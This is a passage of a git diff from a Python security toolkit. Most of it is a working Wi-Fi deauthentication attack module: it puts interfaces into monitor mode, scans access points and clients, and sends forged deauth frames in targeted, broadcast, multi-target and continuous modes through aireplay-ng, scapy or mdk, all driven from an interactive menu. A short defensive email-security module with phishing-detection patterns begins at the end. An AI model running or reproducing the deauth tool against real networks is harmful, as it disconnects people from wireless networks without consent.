'IEEE 802.11' in block or 'ESSID' in block: + name = block.split()[0] + mode = 'managed' + if 'Mode:Monitor' in block: + mode = 'monitor' + elif 'Mode:Master' in block: + mode = 'master' + ch_m = re.search(r'Channel[:\s]*(\d+)', block) + ch = int(ch_m.group(1)) if ch_m else 0 + mac_m = re.search( + r'HWaddr\s+([\da-fA-F:]{17})', block + ) + mac = mac_m.group(1) if mac_m else '' + interfaces.append({ + 'name': name, 'mode': mode, + 'channel': ch, 'mac': mac, 'phy': '' + }) + except Exception: + pass + + # Last resort: /sys/class/net + if not interfaces: + try: + sys_net = Path('/sys/class/net') + if sys_net.exists(): + for d in sys_net.iterdir(): + if (d / 'wireless').exists() or (d / 'phy80211').exists(): + 
interfaces.append({ + 'name': d.name, 'mode': 'unknown', + 'channel': 0, 'mac': '', 'phy': '' + }) + except Exception: + pass + + return interfaces + + def enable_monitor(self, interface: str) -> Dict: + """Put interface into monitor mode. + + Tries airmon-ng first, falls back to iw. + Returns dict with ok, interface (monitor name), and message. + """ + if not interface: + return {'ok': False, 'error': 'No interface specified'} + + # Try airmon-ng + if self.airmon: + try: + # Kill interfering processes + subprocess.run( + [self.airmon, 'check', 'kill'], + capture_output=True, text=True, timeout=10 + ) + result = subprocess.run( + [self.airmon, 'start', interface], + capture_output=True, text=True, timeout=15 + ) + output = result.stdout + result.stderr + # Detect the monitor interface name + mon_match = re.search( + r'\(monitor mode (?:vif )?enabled(?: on| for) \[?(\w+)\]?\)', + output + ) + if mon_match: + mon_iface = mon_match.group(1) + elif os.path.isdir(f'/sys/class/net/{interface}mon'): + mon_iface = f'{interface}mon' + else: + mon_iface = interface + + return { + 'ok': True, + 'interface': mon_iface, + 'message': f'Monitor mode enabled on {mon_iface}' + } + except Exception as e: + return {'ok': False, 'error': f'airmon-ng failed: {e}'} + + # Fallback: iw + if self.iw and self.ip_cmd: + try: + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'down'], + capture_output=True, timeout=5 + ) + result = subprocess.run( + [self.iw, 'dev', interface, 'set', 'type', 'monitor'], + capture_output=True, text=True, timeout=5 + ) + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'up'], + capture_output=True, timeout=5 + ) + if result.returncode == 0: + return { + 'ok': True, + 'interface': interface, + 'message': f'Monitor mode enabled on {interface} (via iw)' + } + return {'ok': False, 'error': result.stderr.strip() or 'iw set monitor failed'} + except Exception as e: + return {'ok': False, 'error': f'iw failed: {e}'} + + return {'ok': False, 'error': 
'No tool available (need airmon-ng or iw+ip)'} + + def disable_monitor(self, interface: str) -> Dict: + """Restore interface to managed mode.""" + if not interface: + return {'ok': False, 'error': 'No interface specified'} + + # Try airmon-ng + if self.airmon: + try: + result = subprocess.run( + [self.airmon, 'stop', interface], + capture_output=True, text=True, timeout=15 + ) + output = result.stdout + result.stderr + managed_match = re.search( + r'\(monitor mode disabled(?: on)? (\w+)\)', output + ) + managed_name = managed_match.group(1) if managed_match else interface.replace('mon', '') + return { + 'ok': True, + 'interface': managed_name, + 'message': f'Managed mode restored on {managed_name}' + } + except Exception as e: + return {'ok': False, 'error': f'airmon-ng stop failed: {e}'} + + # Fallback: iw + if self.iw and self.ip_cmd: + try: + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'down'], + capture_output=True, timeout=5 + ) + result = subprocess.run( + [self.iw, 'dev', interface, 'set', 'type', 'managed'], + capture_output=True, text=True, timeout=5 + ) + subprocess.run( + [self.ip_cmd, 'link', 'set', interface, 'up'], + capture_output=True, timeout=5 + ) + if result.returncode == 0: + return { + 'ok': True, + 'interface': interface, + 'message': f'Managed mode restored on {interface}' + } + return {'ok': False, 'error': result.stderr.strip() or 'iw set managed failed'} + except Exception as e: + return {'ok': False, 'error': f'iw failed: {e}'} + + return {'ok': False, 'error': 'No tool available'} + + # ── Scanning ───────────────────────────────────────────────────────── + + def scan_networks(self, interface: str, duration: int = 10) -> List[Dict]: + """Passive scan for access points. + + Uses airodump-ng CSV output or scapy sniffing. + Returns list of dicts: bssid, ssid, channel, encryption, signal, clients_count. 
+ """ + if not interface: + return [] + + networks = [] + + # Method 1: airodump-ng + if self.airodump: + tmp_prefix = os.path.join(self.data_dir, f'scan_{int(time.time())}') + try: + proc = subprocess.Popen( + [self.airodump, '--write', tmp_prefix, + '--output-format', 'csv', '--write-interval', '1', + interface], + stdout=subprocess.DEVNULL, + stderr=subprocess.DEVNULL + ) + time.sleep(min(duration, 120)) + proc.terminate() + try: + proc.wait(timeout=5) + except subprocess.TimeoutExpired: + proc.kill() + + # Parse CSV + csv_path = f'{tmp_prefix}-01.csv' + if os.path.isfile(csv_path): + networks = self._parse_airodump_csv(csv_path) + # Clean up temp files + for f in Path(self.data_dir).glob( + f'scan_{os.path.basename(tmp_prefix).replace("scan_", "")}*' + ): + try: + f.unlink() + except Exception: + pass + except Exception: + pass + + # Method 2: scapy fallback + if not networks and self._scapy: + networks = self._scan_scapy(interface, duration) + + return networks + + def _parse_airodump_csv(self, csv_path: str) -> List[Dict]: + """Parse airodump-ng CSV output into network list.""" + networks = [] + clients_map: Dict[str, int] = {} + section = 'ap' + + try: + with open(csv_path, 'r', errors='ignore') as f: + for line in f: + line = line.strip() + if not line: + continue + if line.startswith('Station MAC'): + section = 'client' + continue + if line.startswith('BSSID') or line.startswith('\x00'): + continue + + parts = [p.strip() for p in line.split(',')] + + if section == 'ap' and len(parts) >= 14: + bssid = parts[0] + if not _validate_mac(bssid): + continue + channel = 0 + try: + channel = int(parts[3]) + except (ValueError, IndexError): + pass + signal = -100 + try: + signal = int(parts[8]) + except (ValueError, IndexError): + pass + encryption = parts[5] if len(parts) > 5 else '' + ssid = parts[13] if len(parts) > 13 else '' + networks.append({ + 'bssid': bssid, + 'ssid': ssid, + 'channel': channel, + 'encryption': encryption, + 'signal': signal, + 
'clients_count': 0 + }) + + elif section == 'client' and len(parts) >= 6: + client_mac = parts[0] + ap_bssid = parts[5] if len(parts) > 5 else '' + if _validate_mac(ap_bssid): + clients_map[ap_bssid] = clients_map.get(ap_bssid, 0) + 1 + + # Merge client counts + for net in networks: + net['clients_count'] = clients_map.get(net['bssid'], 0) + + except Exception: + pass + + return networks + + def _scan_scapy(self, interface: str, duration: int) -> List[Dict]: + """Scan using scapy beacon sniffing.""" + networks = {} + try: + from scapy.all import Dot11, Dot11Beacon, Dot11Elt, sniff + + def handler(pkt): + if pkt.haslayer(Dot11Beacon): + bssid = pkt[Dot11].addr2 + if not bssid or bssid in networks: + return + ssid = '' + channel = 0 + enc = 'OPEN' + elt = pkt[Dot11Elt] + while elt: + if elt.ID == 0: # SSID + try: + ssid = elt.info.decode('utf-8', errors='replace') + except Exception: + ssid = '' + elif elt.ID == 3: # DS Parameter Set (channel) + try: + channel = int(elt.info[0]) + except Exception: + pass + elt = elt.payload.getlayer(Dot11Elt) + + cap = pkt.sprintf('{Dot11Beacon:%Dot11Beacon.cap%}') + if 'privacy' in cap: + enc = 'WPA/WPA2' + + try: + sig = -(256 - ord(pkt.notdecoded[-4:-3])) + except Exception: + sig = -100 + + networks[bssid] = { + 'bssid': bssid, + 'ssid': ssid, + 'channel': channel, + 'encryption': enc, + 'signal': sig, + 'clients_count': 0 + } + + sniff(iface=interface, prn=handler, timeout=duration, store=False) + except Exception: + pass + + return list(networks.values()) + + def scan_clients(self, interface: str, target_bssid: Optional[str] = None, + duration: int = 10) -> List[Dict]: + """Discover client-AP associations. + + Returns list of dicts: client_mac, ap_bssid, ap_ssid, signal, packets. 
+ """ + if not interface: + return [] + + clients = [] + + # Method 1: airodump-ng with optional BSSID filter + if self.airodump: + tmp_prefix = os.path.join(self.data_dir, f'clients_{int(time.time())}') + cmd = [ + self.airodump, '--write', tmp_prefix, + '--output-format', 'csv', '--write-interval', '1' + ] + if target_bssid and _validate_mac(target_bssid): + cmd += ['--bssid', target_bssid] + cmd.append(interface) + + try: + proc = subprocess.Popen( + cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + time.sleep(min(duration, 120)) + proc.terminate() + try: + proc.wait(timeout=5) + except subprocess.TimeoutExpired: + proc.kill() + + csv_path = f'{tmp_prefix}-01.csv' + if os.path.isfile(csv_path): + clients = self._parse_clients_csv(csv_path, target_bssid) + for f in Path(self.data_dir).glob( + f'clients_{os.path.basename(tmp_prefix).replace("clients_", "")}*' + ): + try: + f.unlink() + except Exception: + pass + except Exception: + pass + + # Method 2: scapy fallback + if not clients and self._scapy: + clients = self._scan_clients_scapy(interface, target_bssid, duration) + + return clients + + def _parse_clients_csv(self, csv_path: str, + target_bssid: Optional[str] = None) -> List[Dict]: + """Parse airodump CSV for client associations.""" + clients = [] + ap_names: Dict[str, str] = {} + section = 'ap' + + try: + with open(csv_path, 'r', errors='ignore') as f: + for line in f: + line = line.strip() + if not line: + continue + if line.startswith('Station MAC'): + section = 'client' + continue + if line.startswith('BSSID'): + continue + + parts = [p.strip() for p in line.split(',')] + + if section == 'ap' and len(parts) >= 14: + bssid = parts[0] + ssid = parts[13] if len(parts) > 13 else '' + if _validate_mac(bssid): + ap_names[bssid] = ssid + + elif section == 'client' and len(parts) >= 6: + client_mac = parts[0] + if not _validate_mac(client_mac): + continue + ap_bssid = parts[5] if len(parts) > 5 else '' + if not _validate_mac(ap_bssid): + continue 
+ if target_bssid and ap_bssid.upper() != target_bssid.upper(): + continue + + signal = -100 + try: + signal = int(parts[3]) + except (ValueError, IndexError): + pass + packets = 0 + try: + packets = int(parts[4]) + except (ValueError, IndexError): + pass + + clients.append({ + 'client_mac': client_mac, + 'ap_bssid': ap_bssid, + 'ap_ssid': ap_names.get(ap_bssid, ''), + 'signal': signal, + 'packets': packets + }) + except Exception: + pass + + return clients + + def _scan_clients_scapy(self, interface: str, + target_bssid: Optional[str], + duration: int) -> List[Dict]: + """Discover clients using scapy.""" + seen: Dict[str, Dict] = {} + try: + from scapy.all import Dot11, sniff + + def handler(pkt): + if not pkt.haslayer(Dot11): + return + d11 = pkt[Dot11] + # Data or management frames — addr1=dest, addr2=src, addr3=bssid + src = d11.addr2 + dst = d11.addr1 + bssid = d11.addr3 + if not src or not bssid: + return + if src == bssid or src == BROADCAST.lower(): + return + if target_bssid and bssid.upper() != target_bssid.upper(): + return + key = f'{src}_{bssid}' + if key not in seen: + seen[key] = { + 'client_mac': src, + 'ap_bssid': bssid, + 'ap_ssid': '', + 'signal': -100, + 'packets': 0 + } + seen[key]['packets'] += 1 + + sniff(iface=interface, prn=handler, timeout=duration, store=False) + except Exception: + pass + + return list(seen.values()) + + # ── Deauthentication Attacks ───────────────────────────────────────── + + def deauth_targeted(self, interface: str, target_bssid: str, + client_mac: str, count: int = 10, + interval: float = 0.1) -> Dict: + """Send deauth frames to a specific client on a specific AP. + + Uses aireplay-ng or scapy Dot11Deauth as fallback. + Returns stats dict. 
+ """ + if not _validate_mac(target_bssid): + return {'ok': False, 'error': 'Invalid target BSSID'} + if not _validate_mac(client_mac): + return {'ok': False, 'error': 'Invalid client MAC'} + count = max(1, min(count, 99999)) + + start_ts = time.time() + frames_sent = 0 + + # Method 1: aireplay-ng + if self.aireplay: + try: + result = subprocess.run( + [self.aireplay, '-0', str(count), + '-a', target_bssid, '-c', client_mac, interface], + capture_output=True, text=True, + timeout=max(30, count * interval * 2 + 10) + ) + output = result.stdout + result.stderr + sent_match = re.search(r'(\d+)\s+(?:ACKs|packets)', output) + if sent_match: + frames_sent = int(sent_match.group(1)) + else: + frames_sent = count + except subprocess.TimeoutExpired: + frames_sent = count + except Exception as e: + return {'ok': False, 'error': f'aireplay-ng failed: {e}'} + + # Method 2: scapy + elif self._scapy: + frames_sent = self._deauth_scapy( + interface, target_bssid, client_mac, count, interval + ) + + # Method 3: mdk4 / mdk3 + elif self.mdk4 or self.mdk3: + tool = self.mdk4 or self.mdk3 + frames_sent = self._deauth_mdk( + tool, interface, target_bssid, client_mac, count + ) + else: + return {'ok': False, 'error': 'No deauth tool available (need aireplay-ng, scapy, or mdk3/mdk4)'} + + elapsed = round(time.time() - start_ts, 2) + record = { + 'timestamp': datetime.now().isoformat(), + 'target_bssid': target_bssid, + 'client_mac': client_mac, + 'mode': 'targeted', + 'count': count, + 'frames_sent': frames_sent, + 'duration': elapsed, + 'interface': interface + } + self._add_history(record) + + return { + 'ok': True, + 'mode': 'targeted', + 'target_bssid': target_bssid, + 'client_mac': client_mac, + 'frames_sent': frames_sent, + 'duration': elapsed + } + + def deauth_broadcast(self, interface: str, target_bssid: str, + count: int = 10, interval: float = 0.1) -> Dict: + """Broadcast deauth to all clients on an AP.""" + return self.deauth_targeted( + interface, target_bssid, BROADCAST, 
count, interval + ) + + def deauth_multi(self, interface: str, targets: List[Dict], + count: int = 10, interval: float = 0.1) -> Dict: + """Deauth multiple AP/client pairs. + + targets: list of {bssid, client_mac} + """ + if not targets: + return {'ok': False, 'error': 'No targets specified'} + + results = [] + total_frames = 0 + + for t in targets: + bssid = t.get('bssid', '') + client = t.get('client_mac', BROADCAST) + if not client: + client = BROADCAST + r = self.deauth_targeted(interface, bssid, client, count, interval) + results.append(r) + if r.get('ok'): + total_frames += r.get('frames_sent', 0) + + return { + 'ok': True, + 'mode': 'multi', + 'targets_count': len(targets), + 'total_frames': total_frames, + 'results': results + } + + def _deauth_scapy(self, interface: str, bssid: str, client: str, + count: int, interval: float) -> int: + """Send deauth using scapy.""" + frames_sent = 0 + try: + from scapy.all import Dot11, Dot11Deauth, RadioTap, sendp + + # Deauth from AP to client + pkt_ap = (RadioTap() / + Dot11(addr1=client, addr2=bssid, addr3=bssid) / + Dot11Deauth(reason=7)) + # Deauth from client to AP + pkt_cl = (RadioTap() / + Dot11(addr1=bssid, addr2=client, addr3=bssid) / + Dot11Deauth(reason=7)) + + for _ in range(count): + sendp(pkt_ap, iface=interface, count=1, verbose=False) + sendp(pkt_cl, iface=interface, count=1, verbose=False) + frames_sent += 2 + if interval > 0: + time.sleep(interval) + + except Exception: + pass + return frames_sent + + def _deauth_mdk(self, tool: str, interface: str, bssid: str, + client: str, count: int) -> int: + """Send deauth using mdk3/mdk4.""" + # Create a target file for mdk + target_file = os.path.join(self.data_dir, 'mdk_targets.txt') + try: + with open(target_file, 'w') as f: + f.write(f'{bssid}\n') + + result = subprocess.run( + [tool, interface, 'd', '-b', target_file, '-c', str(count)], + capture_output=True, text=True, timeout=max(30, count + 10) + ) + return count # mdk does not reliably report frame 
count + except Exception: + return 0 + finally: + try: + os.unlink(target_file) + except Exception: + pass + + # ── Continuous Mode ────────────────────────────────────────────────── + + def start_continuous(self, interface: str, target_bssid: str, + client_mac: Optional[str] = None, + interval: float = 0.5, + burst: int = 5) -> Dict: + """Start continuous deauth in a background thread. + + Sends `burst` deauth frames every `interval` seconds. + """ + if self._continuous_running: + return {'ok': False, 'error': 'Continuous attack already running'} + if not _validate_mac(target_bssid): + return {'ok': False, 'error': 'Invalid target BSSID'} + if client_mac and not _validate_mac(client_mac): + return {'ok': False, 'error': 'Invalid client MAC'} + + client = client_mac or BROADCAST + interval = max(0.05, min(interval, 60.0)) + burst = max(1, min(burst, 1000)) + + self._continuous_running = True + self._continuous_frames_sent = 0 + self._continuous_start_time = time.time() + self._continuous_target = { + 'interface': interface, + 'target_bssid': target_bssid, + 'client_mac': client, + 'interval': interval, + 'burst': burst + } + + def _worker(): + while self._continuous_running: + r = self.deauth_targeted( + interface, target_bssid, client, burst, 0 + ) + if r.get('ok'): + self._continuous_frames_sent += r.get('frames_sent', 0) + time.sleep(interval) + + self._continuous_thread = threading.Thread( + target=_worker, daemon=True, name='deauth-continuous' + ) + self._continuous_thread.start() + + return { + 'ok': True, + 'message': f'Continuous deauth started against {target_bssid}', + 'mode': 'broadcast' if client == BROADCAST else 'targeted' + } + + def stop_continuous(self) -> Dict: + """Stop continuous deauth attack.""" + if not self._continuous_running: + return {'ok': False, 'error': 'No continuous attack running'} + + self._continuous_running = False + if self._continuous_thread: + self._continuous_thread.join(timeout=5) + self._continuous_thread = None + + elapsed 
= round(time.time() - self._continuous_start_time, 2) + frames = self._continuous_frames_sent + + record = { + 'timestamp': datetime.now().isoformat(), + 'target_bssid': self._continuous_target.get('target_bssid', ''), + 'client_mac': self._continuous_target.get('client_mac', ''), + 'mode': 'continuous', + 'count': frames, + 'frames_sent': frames, + 'duration': elapsed, + 'interface': self._continuous_target.get('interface', '') + } + self._add_history(record) + + return { + 'ok': True, + 'message': 'Continuous attack stopped', + 'frames_sent': frames, + 'duration': elapsed + } + + def is_attacking(self) -> bool: + """Check if continuous attack is running.""" + return self._continuous_running + + def get_attack_status(self) -> Dict: + """Return current attack state.""" + if not self._continuous_running: + return { + 'running': False, + 'target_bssid': '', + 'client_mac': '', + 'frames_sent': 0, + 'duration': 0, + 'mode': 'idle' + } + + elapsed = round(time.time() - self._continuous_start_time, 2) + client = self._continuous_target.get('client_mac', BROADCAST) + mode = 'broadcast' if client == BROADCAST else 'targeted' + + return { + 'running': True, + 'target_bssid': self._continuous_target.get('target_bssid', ''), + 'client_mac': client, + 'frames_sent': self._continuous_frames_sent, + 'duration': elapsed, + 'mode': mode, + 'interval': self._continuous_target.get('interval', 0), + 'burst': self._continuous_target.get('burst', 0) + } + + # ── Channel Control ────────────────────────────────────────────────── + + def set_channel(self, interface: str, channel: int) -> Dict: + """Set interface to a specific wireless channel.""" + channel = max(1, min(channel, 196)) + + if self.iw: + ok, out = _run([self.iw, 'dev', interface, 'set', 'channel', str(channel)]) + if ok: + self._current_channel = channel + return {'ok': True, 'channel': channel, 'message': f'Set channel {channel}'} + return {'ok': False, 'error': out or f'Failed to set channel {channel}'} + + if 
self.iwconfig: + ok, out = _run([self.iwconfig, interface, 'channel', str(channel)]) + if ok: + self._current_channel = channel + return {'ok': True, 'channel': channel, 'message': f'Set channel {channel}'} + return {'ok': False, 'error': out or f'Failed to set channel {channel}'} + + return {'ok': False, 'error': 'No tool available (need iw or iwconfig)'} + + def channel_hop(self, interface: str, channels: Optional[List[int]] = None, + dwell: float = 0.5) -> Dict: + """Start channel hopping in a background thread. + + Default channels: 1-14 (2.4 GHz). + """ + if self._hop_running: + return {'ok': False, 'error': 'Channel hopping already active'} + if not interface: + return {'ok': False, 'error': 'No interface specified'} + + if not channels: + channels = list(range(1, 15)) + dwell = max(0.1, min(dwell, 30.0)) + + self._hop_running = True + + def _hop_worker(): + idx = 0 + while self._hop_running: + ch = channels[idx % len(channels)] + self.set_channel(interface, ch) + idx += 1 + time.sleep(dwell) + + self._hop_thread = threading.Thread( + target=_hop_worker, daemon=True, name='deauth-channel-hop' + ) + self._hop_thread.start() + + return { + 'ok': True, + 'message': f'Channel hopping started on {interface}', + 'channels': channels, + 'dwell': dwell + } + + def stop_channel_hop(self) -> Dict: + """Stop channel hopping.""" + if not self._hop_running: + return {'ok': False, 'error': 'Channel hopping not active'} + + self._hop_running = False + if self._hop_thread: + self._hop_thread.join(timeout=5) + self._hop_thread = None + + return {'ok': True, 'message': 'Channel hopping stopped'} + + # ── History ────────────────────────────────────────────────────────── + + def get_attack_history(self) -> List[Dict]: + """Return past attacks with timestamps and stats.""" + return list(self._history) + + def clear_history(self) -> Dict: + """Clear attack history.""" + self._history = [] + self._save_history() + return {'ok': True, 'message': 'History cleared'} + + def 
_add_history(self, record: Dict): + """Append an attack record and persist.""" + self._history.append(record) + # Keep last 500 entries + if len(self._history) > 500: + self._history = self._history[-500:] + self._save_history() + + def _load_history(self): + """Load history from disk.""" + try: + if os.path.isfile(self.history_path): + with open(self.history_path, 'r') as f: + self._history = json.load(f) + except Exception: + self._history = [] + + def _save_history(self): + """Persist history to disk.""" + try: + with open(self.history_path, 'w') as f: + json.dump(self._history, f, indent=2) + except Exception: + pass + + # ── CLI Runner ─────────────────────────────────────────────────────── + + def print_status(self, message: str, status: str = "info"): + colors = { + "info": Colors.CYAN, "success": Colors.GREEN, + "warning": Colors.YELLOW, "error": Colors.RED + } + symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"} + print(f"{colors.get(status, Colors.WHITE)}" + f"[{symbols.get(status, '*')}] {message}{Colors.RESET}") + + +def run(): + """CLI entry point for the deauth module.""" + clear_screen() + display_banner() + deauth = get_deauth() + + # Show tool status + tools = deauth.get_tools_status() + available = [k for k, v in tools.items() if v] + missing = [k for k, v in tools.items() if not v] + deauth.print_status(f"Available tools: {', '.join(available) if available else 'none'}", "info") + if missing: + deauth.print_status(f"Missing tools: {', '.join(missing)}", "warning") + print() + + selected_iface = None + selected_bssid = None + selected_client = None + + while True: + print(f"\n{Colors.BOLD}{Colors.RED}=== Deauth Attack ==={Colors.RESET}") + print(f" Interface: {Colors.CYAN}{selected_iface or 'none'}{Colors.RESET}") + print(f" Target AP: {Colors.CYAN}{selected_bssid or 'none'}{Colors.RESET}") + print(f" Client: {Colors.CYAN}{selected_client or 'broadcast'}{Colors.RESET}") + if deauth.is_attacking(): + status = 
deauth.get_attack_status() + print(f" {Colors.RED}[ATTACKING]{Colors.RESET} " + f"{status['frames_sent']} frames / {status['duration']}s") + print() + print(f" {Colors.GREEN}1{Colors.RESET} - Select Interface") + print(f" {Colors.GREEN}2{Colors.RESET} - Scan Networks") + print(f" {Colors.GREEN}3{Colors.RESET} - Scan Clients") + print(f" {Colors.GREEN}4{Colors.RESET} - Targeted Deauth") + print(f" {Colors.GREEN}5{Colors.RESET} - Broadcast Deauth") + print(f" {Colors.GREEN}6{Colors.RESET} - Continuous Mode") + print(f" {Colors.GREEN}7{Colors.RESET} - Stop Attack") + print(f" {Colors.GREEN}8{Colors.RESET} - Set Channel") + print(f" {Colors.GREEN}0{Colors.RESET} - Back") + print() + + choice = input(f"{Colors.BOLD}Choice > {Colors.RESET}").strip() + + if choice == '0': + if deauth.is_attacking(): + deauth.stop_continuous() + deauth.print_status("Stopped continuous attack", "warning") + break + + elif choice == '1': + ifaces = deauth.get_interfaces() + if not ifaces: + deauth.print_status("No wireless interfaces found", "error") + continue + print(f"\n{'#':<4} {'Interface':<15} {'Mode':<12} {'Channel':<8} {'MAC'}") + for i, ifc in enumerate(ifaces): + print(f"{i+1:<4} {ifc['name']:<15} {ifc['mode']:<12} " + f"{ifc['channel']:<8} {ifc['mac']}") + sel = input(f"\nSelect interface (1-{len(ifaces)}): ").strip() + try: + idx = int(sel) - 1 + if 0 <= idx < len(ifaces): + selected_iface = ifaces[idx]['name'] + deauth.print_status(f"Selected: {selected_iface}", "success") + if ifaces[idx]['mode'] != 'monitor': + en = input("Enable monitor mode? 
(y/n): ").strip().lower() + if en == 'y': + r = deauth.enable_monitor(selected_iface) + if r['ok']: + selected_iface = r['interface'] + deauth.print_status(r['message'], "success") + else: + deauth.print_status(r['error'], "error") + except ValueError: + pass + + elif choice == '2': + if not selected_iface: + deauth.print_status("Select an interface first", "warning") + continue + dur = input("Scan duration (seconds) [10]: ").strip() + dur = int(dur) if dur.isdigit() else 10 + deauth.print_status(f"Scanning for {dur}s on {selected_iface}...", "info") + nets = deauth.scan_networks(selected_iface, dur) + if not nets: + deauth.print_status("No networks found", "warning") + continue + print(f"\n{'#':<4} {'BSSID':<20} {'SSID':<25} {'CH':<5} " + f"{'Enc':<12} {'Sig':<6} {'Clients'}") + for i, n in enumerate(nets): + print(f"{i+1:<4} {n['bssid']:<20} {n['ssid']:<25} " + f"{n['channel']:<5} {n['encryption']:<12} " + f"{n['signal']:<6} {n['clients_count']}") + sel = input(f"\nSelect target AP (1-{len(nets)}, Enter to skip): ").strip() + try: + idx = int(sel) - 1 + if 0 <= idx < len(nets): + selected_bssid = nets[idx]['bssid'] + deauth.print_status( + f"Target: {nets[idx]['ssid']} ({selected_bssid})", "success" + ) + except ValueError: + pass + + elif choice == '3': + if not selected_iface: + deauth.print_status("Select an interface first", "warning") + continue + dur = input("Scan duration (seconds) [10]: ").strip() + dur = int(dur) if dur.isdigit() else 10 + deauth.print_status( + f"Scanning clients{' on ' + selected_bssid if selected_bssid else ''}...", + "info" + ) + clients = deauth.scan_clients(selected_iface, selected_bssid, dur) + if not clients: + deauth.print_status("No clients found", "warning") + continue + print(f"\n{'#':<4} {'Client MAC':<20} {'AP BSSID':<20} " + f"{'Signal':<8} {'Packets'}") + for i, c in enumerate(clients): + print(f"{i+1:<4} {c['client_mac']:<20} {c['ap_bssid']:<20} " + f"{c['signal']:<8} {c['packets']}") + sel = input(f"\nSelect client 
(1-{len(clients)}, Enter for broadcast): ").strip() + try: + idx = int(sel) - 1 + if 0 <= idx < len(clients): + selected_client = clients[idx]['client_mac'] + if not selected_bssid: + selected_bssid = clients[idx]['ap_bssid'] + deauth.print_status(f"Client: {selected_client}", "success") + except ValueError: + selected_client = None + + elif choice == '4': + if not selected_iface or not selected_bssid: + deauth.print_status("Select interface and target AP first", "warning") + continue + client = selected_client or input("Client MAC (Enter for broadcast): ").strip() + if not client: + client = BROADCAST + cnt = input("Frame count [10]: ").strip() + cnt = int(cnt) if cnt.isdigit() else 10 + deauth.print_status(f"Sending {cnt} deauth frames...", "info") + r = deauth.deauth_targeted(selected_iface, selected_bssid, client, cnt) + if r['ok']: + deauth.print_status( + f"Sent {r['frames_sent']} frames in {r['duration']}s", "success" + ) + else: + deauth.print_status(r['error'], "error") + + elif choice == '5': + if not selected_iface or not selected_bssid: + deauth.print_status("Select interface and target AP first", "warning") + continue + cnt = input("Frame count [10]: ").strip() + cnt = int(cnt) if cnt.isdigit() else 10 + deauth.print_status(f"Broadcasting {cnt} deauth frames...", "info") + r = deauth.deauth_broadcast(selected_iface, selected_bssid, cnt) + if r['ok']: + deauth.print_status( + f"Sent {r['frames_sent']} frames in {r['duration']}s", "success" + ) + else: + deauth.print_status(r['error'], "error") + + elif choice == '6': + if not selected_iface or not selected_bssid: + deauth.print_status("Select interface and target AP first", "warning") + continue + client = selected_client or BROADCAST + intv = input("Interval between bursts (seconds) [0.5]: ").strip() + intv = float(intv) if intv else 0.5 + bst = input("Burst size [5]: ").strip() + bst = int(bst) if bst.isdigit() else 5 + r = deauth.start_continuous( + selected_iface, selected_bssid, client, intv, bst + 
) + if r['ok']: + deauth.print_status(r['message'], "success") + else: + deauth.print_status(r['error'], "error") + + elif choice == '7': + r = deauth.stop_continuous() + if r['ok']: + deauth.print_status( + f"Stopped. {r['frames_sent']} frames in {r['duration']}s", + "success" + ) + else: + deauth.print_status(r.get('error', 'No attack running'), "warning") + + elif choice == '8': + if not selected_iface: + deauth.print_status("Select an interface first", "warning") + continue + ch = input("Channel (1-196): ").strip() + try: + ch = int(ch) + r = deauth.set_channel(selected_iface, ch) + if r['ok']: + deauth.print_status(r['message'], "success") + else: + deauth.print_status(r['error'], "error") + except ValueError: + deauth.print_status("Invalid channel number", "error") + + else: + deauth.print_status("Invalid choice", "warning") diff --git a/modules/email_sec.py b/modules/email_sec.py new file mode 100644 index 0000000..27e09d2 --- /dev/null +++ b/modules/email_sec.py @@ -0,0 +1,1590 @@ +"""AUTARCH Email Security + +DMARC/SPF/DKIM analysis, email header forensics, phishing detection, +mailbox search, and abuse report generation for email security assessment. 
+""" + +DESCRIPTION = "Email security — DMARC, SPF, header forensics" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +import os +import re +import sys +import json +import ssl +import time +import socket +import struct +import hashlib +import imaplib +import poplib +import email +import email.header +import email.utils +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any, Tuple +from urllib.parse import urlparse +import subprocess + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +sys.path.insert(0, str(Path(__file__).parent.parent)) +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = BLUE = GREEN = YELLOW = CYAN = WHITE = DIM = RESET = '' + def clear_screen(): pass + def display_banner(): pass + + +# -- Constants --------------------------------------------------------------- + +COMMON_DKIM_SELECTORS = [ + 'default', 'google', 'selector1', 'selector2', 'k1', 'k2', + 'dkim', 'mail', 's1', 's2', 'smtp', 'mandrill', 'everlytickey1', + 'everlytickey2', 'sig1', 'mxvault', 'a1', 'a2', 'cm', 'pm', + 'protonmail', 'protonmail2', 'protonmail3', +] + +BLACKLISTS = [ + 'zen.spamhaus.org', + 'bl.spamcop.net', + 'b.barracudacentral.org', + 'dnsbl.sorbs.net', + 'spam.dnsbl.sorbs.net', + 'dul.dnsbl.sorbs.net', + 'cbl.abuseat.org', + 'dnsbl-1.uceprotect.net', + 'psbl.surriel.com', + 'all.s5h.net', + 'rbl.interserver.net', + 'dnsbl.dronebl.org', + 'db.wpbl.info', + 'bl.mailspike.net', + 'truncate.gbudb.net', +] + +PHISHING_INDICATORS = { + 'urgency_words': { + 'patterns': [ + r'\b(urgent|immediate|action\s+required|act\s+now|expires?\s+today)\b', + r'\b(suspended|disabled|locked|compromised|unauthorized)\b', + r'\b(verify\s+your|confirm\s+your|update\s+your|validate)\b', + r'\b(within\s+24\s+hours|limited\s+time|final\s+notice|last\s+chance)\b', + ], + 
